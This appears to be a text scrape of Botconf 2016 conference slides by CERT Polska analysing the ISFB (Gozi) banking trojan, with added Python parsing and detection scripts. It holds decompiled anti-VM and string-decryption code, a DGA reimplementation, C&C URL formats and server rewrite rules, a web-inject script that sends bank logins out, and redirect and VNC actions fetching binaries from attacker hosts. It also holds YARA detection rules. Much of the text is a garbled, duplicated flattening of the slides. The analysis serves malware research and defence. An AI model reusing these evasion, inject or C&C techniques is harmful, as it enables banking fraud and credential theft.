            $decode_bss = { 8D 7D ?? AB 66 AB 6A 08 AA 68 [4] 8D 5? }
        condition:
            $decode_bss and 1 of ($str*)
    }


Anti-VM

    do
    {
        pci.cbSize = 20;
        GetCursorInfo(&pci);
        // the mouse position feeds the string-decryption key: no mouse movement, no decoded strings
        ret = decode_bss(pci.ptScreenPos.y - old_y - old_x + pci.ptScreenPos.x);
        old_x = pci.ptScreenPos.x;
        old_y = pci.ptScreenPos.x;   // sic, as in the decompiled sample
    }
    while ( ret == 12 );

C


Anti-VM


Anti-VM

    DeviceInfoData.cbSize = 28;
    if ( SetupDiEnumDeviceInfo(v1, 0, &DeviceInfoData) )
    {
        // 0xC = SPDRP_FRIENDLYNAME: first call only sizes the buffer
        SetupDiGetDeviceRegistryPropertyA(v1, &DeviceInfoData, 0xCu, &Property, 0, 0, &PropertyBufferSize);
        if ( PropertyBufferSize )
        {
            v2 = (BYTE *)xHeapAlloc(PropertyBufferSize);
            v3 = (CHAR *)v2;
            if ( v2 )
            {
                if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSet, &DeviceInfoData, 0xCu, &Property, v2, PropertyBufferSize, &PropertyBufferSize)
                  && (StrStrIA(v3, (LPCSTR)"vbox") || StrStrIA(v3, "qemu") || StrStrIA(v3, "vmware") || StrStrIA(v3, "virtual hd")) )
                {
                    v0 = 1;
                }
                xHeapFree(v3);
            }
        }
    }

C


String encryption

    signed int __stdcall decode_bss(int shift)
    {
        // v2 points to the section header of .bss
        if ( !v2 )
            return 2;
        v6 = v2->VirtualAddress;
        if ( !v6 || !v2->SizeOfRawData )
            return 192;
        v7 = v2->SizeOfRawData;
        v8 = *(_DWORD *)"016";
        v9 = v13;
        // key = low 5 bits of the caller-supplied shift + build-date string words ^ (size + VA)
        v10 = (shift & 0x1F) + (*(_DWORD *)"29 2016" ^ *(_DWORD *)"Oct 29 2016" ^ (v7 + v6));
        XorDecryptBuffer(v7, (int *)((char *)v13 + v6), v2->SizeOfRawData, v10);
        dword_4064EC = dword_40766E + dword_407662 + dword_407666;
        if ( dword_40766E + dword_407662 + dword_407666 != 0xEE553B4E )   // check if correctly decoded
        {
            // wrong key: re-encrypt and report 12 so the caller retries with a new shift
            XorEncryptBuffer(dword_407662, (IMAGE_DOS_HEADER *)((char *)v9 + v2->VirtualAddress), v2->SizeOfRawData);
            v14 = 12;
        }

C


Joined resources, or FJ-structs

    typedef struct {
        DWORD fj_magic;
        DWORD addr;
        DWORD size;
        DWORD crc32_name;
        DWORD flags;        // OR'ed with 0x10000 means it is packed with aPLib
    } isfb_fj_elem;

C


Joined resources, or J1-structs

    typedef struct {
        DWORD j1_magic;
        DWORD flags;        // can be aPLib packed
        DWORD crc32_name;
        DWORD addr;
        DWORD size;
    } isfb_j1_elem;

C

    - 0x4F75CEA7, 0x9e154a0c   CRC_CLIENT32
    - 0xD722AFCB, 0x8365B957, 0x8fb1dde1   CRC_CLIENT_INI
    - 0xE1285E64   CRC_PUBLIC_KEY
    - 0x90F8AAB4, 0x41982e1f   CRC_CLIENT64
    - 0x7A042A8A   NEW - UNKNOWN
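To make the two element layouts above concrete, here is an added Python walker for a joined-resource table, written for this page rather than taken from the talk or from the author's tooling. It assumes the magic DWORDs are the ASCII tags 'FJ' and 'J1' (the slides name the struct families but not the values), treats addr as an offset into the blob it is handed, and runs against a constructed two-entry image.

```python
import struct

# Element layouts as given on the slides (five little-endian DWORDs each):
#   FJ: fj_magic, addr, size, crc32_name, flags
#   J1: j1_magic, flags, crc32_name, addr, size
# The magic values are NOT on the slides; ASCII 'FJ' / 'J1' is an assumption of this example.
FJ_MAGIC = int.from_bytes(b"FJ\x00\x00", "little")
J1_MAGIC = int.from_bytes(b"J1\x00\x00", "little")
APLIB_FLAG = 0x10000          # flags | 0x10000 -> body is aPLib-packed
ELEM_SIZE = 20

# crc32_name values listed on the slide, mapped to the resource role
CRC_NAMES = {
    0x4F75CEA7: "CRC_CLIENT32", 0x9E154A0C: "CRC_CLIENT32",
    0xD722AFCB: "CRC_CLIENT_INI", 0x8365B957: "CRC_CLIENT_INI", 0x8FB1DDE1: "CRC_CLIENT_INI",
    0xE1285E64: "CRC_PUBLIC_KEY",
    0x90F8AAB4: "CRC_CLIENT64", 0x41982E1F: "CRC_CLIENT64",
    0x7A042A8A: "NEW - UNKNOWN",
}


def parse_elem(blob, off):
    """Decode one element at off, honouring the two field orders.
    Returns None when neither magic is present (end of table or not an entry)."""
    if off + ELEM_SIZE > len(blob):
        return None
    words = struct.unpack_from("<5I", blob, off)
    if words[0] == FJ_MAGIC:
        _, addr, size, crc, flags = words
        kind = "FJ"
    elif words[0] == J1_MAGIC:
        _, flags, crc, addr, size = words
        kind = "J1"
    else:
        return None
    return {"kind": kind, "addr": addr, "size": size, "crc32_name": crc,
            "name": CRC_NAMES.get(crc, "unknown(0x%08x)" % crc),
            "aplib_packed": bool(flags & APLIB_FLAG)}


def parse_table(blob, off):
    """Walk consecutive elements from off until the magic no longer matches."""
    elems = []
    while True:
        e = parse_elem(blob, off)
        if e is None:
            return elems
        elems.append(e)
        off += ELEM_SIZE


def extract(blob, elem):
    """Slice the resource body. addr is used as an offset into blob (assumption;
    in a mapped sample it is an RVA to translate first). Entries pointing outside
    the image are rejected instead of silently truncated. aPLib-packed bodies are
    returned still packed; depacking needs an aPLib implementation."""
    start, end = elem["addr"], elem["addr"] + elem["size"]
    if end > len(blob) or start >= end:
        raise ValueError("resource %s points outside the image" % elem["name"])
    return blob[start:end]


def build_sample():
    """Constructed test image (not from a real sample): a two-entry table,
    one FJ and one J1 element, followed by the two resource bodies."""
    table_off, n = 0x40, 2
    body1 = b"MZ" + b"\x00" * 30                 # stands in for a packed CLIENT32 blob
    body2 = b"-----BEGIN PUBLIC KEY-----"
    addr1 = table_off + n * ELEM_SIZE
    addr2 = addr1 + len(body1)
    fj = struct.pack("<5I", FJ_MAGIC, addr1, len(body1), 0x4F75CEA7, APLIB_FLAG | 1)
    j1 = struct.pack("<5I", J1_MAGIC, 0, 0xE1285E64, addr2, len(body2))
    img = bytearray(addr2 + len(body2))
    img[table_off:table_off + n * ELEM_SIZE] = fj + j1
    img[addr1:addr1 + len(body1)] = body1
    img[addr2:addr2 + len(body2)] = body2
    return bytes(img), table_off


if __name__ == "__main__":
    image, table_off = build_sample()
    for elem in parse_table(image, table_off):
        print(elem["kind"], elem["name"], "packed" if elem["aplib_packed"] else "raw",
              len(extract(image, elem)), "bytes")
```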


Static configuration

    typedef struct {
        DWORD off;
        DWORD flags;
        QWORD value;
        QWORD uid;
    } isfb_cfg_elem;

    typedef struct {
        QWORD count;
        isfb_cfg_elem elem[count];
        char string_table[];
    };

C


Static cfg - fields


Static cfg - fields

    · 0x556aed8f - server
    · 0xea9ea760 - bootstrap
    · 0x656b798a - botnet
    · 0x4fa8693e - key
    · 0xd0665bf6, 0x75e6145c - domains
    · 0xefc574ae - dga_seed
    · 0x73177345 - dga_base_url
    · 0xec99df2e - dga_tld
    · 0xdf351e24 - tor32_dll
    · 0x510f22d2 - tor_domains


Static cfg


Static cfg


Static cfg


Man in the Browser, or where does my money go

Dynamic config


Dynamic config

    typedef struct {
        DWORD size;
        BYTE  data[size];
    } inject_elem;

    typedef struct {
        inject_elem target;      // url glob
        inject_elem action;      // or regex
        inject_elem params[4];   // other params
    } inject_chunk;

    typedef inject_chunk injects_t[];

C


Web Injects

    var bn = "US_" + "BOFA_1";
    var bot_id = "ID_" + bn;
    var sa = decode64();
    var req = "send=0&u_bot_id=" + bot_id + "&bn=" + bn + "&page=8&u_login=&u_pass=&log=" + get_me_core;
    sendScriptRequest(sa, req, function statusCall1() {
        var element = document.getElementById("loader");
        element.parentNode.removeChild(element);
    });
    })();


Web Actions

    · FILE
    · SCREENSHOT
    · HIDDEN
    · NEWGRAB
    · VIDEO
    · PROCESS
    · POST
    · VNC


Web Actions


The Bot

Registry Keys


Registry Keys

    Software\AppDataLow\Software\Microsoft\[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}

    · Install
    · Client
    · NetCfg
    · LastTask
    · LastConfig


Other Actions

    · GET_CERTS
    · GET_COOKIES
    · GET_SYSINFO
    · LOAD_EXE
    · GET_FILES
    · SOCKS_START
    · GET_KEYLOG
    · GET_MAIL
    · GET_FTP
    · VNC_START
    · URL_BLOCK


Calling Home


ET phone home

    · Static domains inside configuration files
    · DGA based on a template and current data
    · C&C hidden in the TOR network
    · P2P network


DGA

    rnd = LsaRandom()
    rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
    # rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0
    r = []
    for i in range(kwargs['count']):
        suf = kwargs['tld'][(rnd.rnd() >> 1) % len(kwargs['tld'])]   # rnd.choose(kwargs['tld'])
        dom_l = rnd.rnd() % self.DGA_MIN_LEN + self.DGA_MIN_LEN
        wc = 0
        dom = []
        while wc < dom_l:
            d = rnd.choose(words)
            ws = len(d)
            if not rnd.rnd() % 3:
                ws -= 2
            if wc + ws > self.DGA_MAX_LEN:
                continue
            dom.append(d[:ws])
            wc += ws
        r.append(''.join(dom) + suf)

PYTHON


TOR


TOR


P2P

    typedef struct {
        DWORD magic;        // 0x395f2ec1
        DWORD my_secret;
        DWORD his_secret;
        BYTE  cmd0;
        BYTE  cmd1;
        BYTE  data[];
    } isfb_p2p_inner_packet;

    typedef struct {
        BYTE  flags;
        DWORD salt;                    // 4 random higher bytes of keys
        isfb_p2p_inner_packet p;       // encrypted
    } isfb_p2p_packet;

C


Internet is Hard


URL format

    http://%s/%s?user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

    /tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY
    oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

    cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg
    t[RAND][RAND]=data


URL format

    decode_req = lambda d: decrypt(d.decode('base64'), SKEY)
    d = re.sub('_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)
    try:
        e = d.decode('base64')
    except Exception as e:
        d = d + '=='
    pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))

PYTHON

    {'crc': '7001380',
     'id': '1065',
     'ppc': 'xi',
     'server': '12',
     'soft': '1',
     'user': '0c0d784a0cf755970edbdf4c0cb27fca',
     'version': '214887'}


URL format


URL format

    t.php           get new task              used until Sep 2015
    c.php           get new config            used until Sep 2015
    d.php           send stolen data          used until Sep 2015
    images/*.gif    get new task              current format
    images/*.jpeg   get new config            current format
    images/*.bmp    send stolen data          current format
    images/*.avi    download 2nd stage dll    not every C&C
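As an added example (not the slide 40 decoder nor any CERT.pl tool), the Python below maps URLs from a proxy log onto the endpoint table above and undoes the transport encoding of the blob seen in the slide 39 sample (the _XX escapes and slashes inserted into the path); the Serpent decryption step needs the per-sample key from the static config and is left out, so only the still-encrypted base64 is returned. Hosts, client addresses and log lines are constructed.

```python
import base64
import re
from urllib.parse import urlsplit

# Endpoint table from the slides: old <t|c|d><random>.php style and the
# current /images/<blob>.<ext> style.
OLD_ENDPOINTS = {"t": "get new task", "c": "get new config", "d": "send stolen data"}
NEW_ENDPOINTS = {".gif": "get new task", ".jpeg": "get new config",
                 ".bmp": "send stolen data", ".avi": "download 2nd stage dll"}

OLD_RE = re.compile(r"^/([tcd])[A-Za-z0-9]*\.php$")
NEW_RE = re.compile(r"^/images/(.+)(\.(?:gif|jpeg|bmp|avi))$")


def unescape_payload(s, drop_slashes):
    """Undo the transport encoding of the base64 blob: '/' inserted into the
    path are dropped (path form only), '_XX' hex escapes such as _2B ('+') and
    _2F ('/') are restored, and padding is repaired, mirroring the re.sub and
    '==' fix-up of the slide 40 decoder."""
    if drop_slashes:
        s = s.replace("/", "")
    s = re.sub(r"_([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)
    return s + "=" * (-len(s) % 4)


def is_base64(s):
    try:
        base64.b64decode(s, validate=True)
        return True
    except ValueError:  # binascii.Error is a ValueError subclass
        return False


def classify_url(url, min_blob=32):
    """Map a URL onto the endpoint table. Returns None for anything that does
    not match, including an ordinary /images/logo.gif whose 'blob' is too short
    to be a ciphertext. The payload comes back still base64-encoded."""
    parts = urlsplit(url)
    m = OLD_RE.match(parts.path)
    if m and "=" in parts.query:
        _, blob = parts.query.split("=", 1)  # one random-named parameter
        b64 = unescape_payload(blob, drop_slashes=False)
        if is_base64(b64) and len(b64) >= min_blob:
            return {"format": "old", "meaning": OLD_ENDPOINTS[m.group(1)], "payload_b64": b64}
    m = NEW_RE.match(parts.path)
    if m:
        b64 = unescape_payload(m.group(1), drop_slashes=True)
        if is_base64(b64) and len(b64) >= min_blob:
            return {"format": "current", "meaning": NEW_ENDPOINTS[m.group(2)], "payload_b64": b64}
    return None


def payload_bytes(verdict):
    """The raw ciphertext carried by a classified URL (the input to Serpent)."""
    return base64.b64decode(verdict["payload_b64"])


def parse_plaintext(pt):
    """Split a decrypted request body the way slide 40 does: strip NUL padding,
    split on '&' and '='. The first pair is a random junk key such as oxsxc=kcxsfx."""
    return dict(kv.split("=", 1) for kv in pt.strip("\x00").split("&") if "=" in kv)


def scan_proxy_log(lines):
    """(client, meaning, format) for every '<client> <method> <url>' line that matches."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        verdict = classify_url(fields[2])
        if verdict:
            hits.append((fields[0], verdict["meaning"], verdict["format"]))
    return hits


# Constructed sample data (not from a real infection). The ciphertext bytes are
# chosen so that their base64 is only '+' and '/', which exercises the escaping.
CIPHER = bytes([0xFB, 0xFF, 0xBF]) * 20                      # base64 -> "+/+/" * 20
_b64 = base64.b64encode(CIPHER).decode()
_escaped = _b64.replace("+", "_2B").replace("/", "_2F")
_path_blob = _escaped[:60] + "/" + _escaped[60:]              # a '/' inserted into the path
SAMPLE_LOG = [
    "10.0.0.5 GET http://www.example.com/images/logo.gif",
    "10.0.0.7 GET http://c2.example/images/" + _path_blob + ".jpeg",
    "10.0.0.7 GET http://c2.example/images/" + _path_blob + ".bmp",
    "10.0.0.9 GET http://c2.example/tfctq.php?mkvf=" + _b64,
    "10.0.0.9 GET http://www.example.com/index.php",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```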


C&C response


C&C response

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 14: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 1458

One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)

1458

02122016 ISFB

httpslokalhostpltalksbotconf20161 1558

Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)

C

1558

Anti-VM

02122016 ISFB

httpslokalhostpltalksbotconf20161 1658

Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)

C

1658

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

